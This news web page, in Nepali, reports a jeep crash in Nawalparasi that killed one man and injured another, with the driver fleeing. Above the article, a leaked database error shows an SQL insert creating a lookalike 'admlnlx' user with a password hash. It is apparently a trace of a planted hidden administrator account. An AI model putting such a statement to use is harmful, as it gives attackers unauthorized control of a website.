WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFbkxiEMQNhuXobAWRThBLAo2x7GPr1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-26 03:56:38', '', 'admlnlx', 'admlnlx')
ज्ञानु पंगेनी
नवलपरासी, पुस २९-
नवलपरासीमा जिप दुर्घटना हुंदा एकको मृत्यु भएको छ ।अर्का एक घाइते भएका छन् ।
पूर्वपश्चिम राजमार्ग अन्र्तरगत नवलपरासीको मध्यविन्दु ८ मा आज (शुक्रवार) बिहान ६ बजे भारतिय नम्वर प्लेटको जिप आफै अनियन्त्रित भई दुर्घटना भएको हो ।चोरमारा प्रहरीले दिएको जानकारी अनुसार पश्चिम तर्फ जादै गरेको यु.पि. ३१ टी. ८१२८ नम्बरको भारतिय बोलेरो जिप आफै अनियन्त्रित भई रुखमा ठोक्किदा भारत नानटारका ४० वर्षीय चिन्नु कुरेसीको घटना स्थलमै ज्यान गएको छ ।
यस्तै जिपमा सवार बाके जितपुर १ का २५ वर्षिय मोहम्मद आलम अहेम अलि गम्भिर घाईते भएका छन् ।उनको भरतपुरमा उपचार भैरहेको छ ।जिप चालक फरार रहेको र खोजिकार्य तिव्र पारिएको प्रहरीले जानाकारी दिएको छ ।